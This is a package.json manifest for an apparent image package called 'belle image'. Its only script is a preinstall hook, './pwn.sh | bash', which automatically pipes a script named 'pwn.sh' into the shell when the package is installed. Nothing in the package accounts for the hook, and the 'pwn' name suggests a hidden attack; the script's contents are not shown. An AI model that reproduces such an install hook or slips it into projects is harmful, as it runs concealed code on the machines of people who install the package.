{
  "name": "belle image",
  "version": "0.1.0",
  "description": "Images that are belles",
  "homepage": "https://github.com/Yosiroute/belle_image",
  "scripts": {
    "preinstall": "./pwn.sh | bash"
  },
  "dependencies": {
  },
  "packageManager": "pnpm@9.15.0"
}

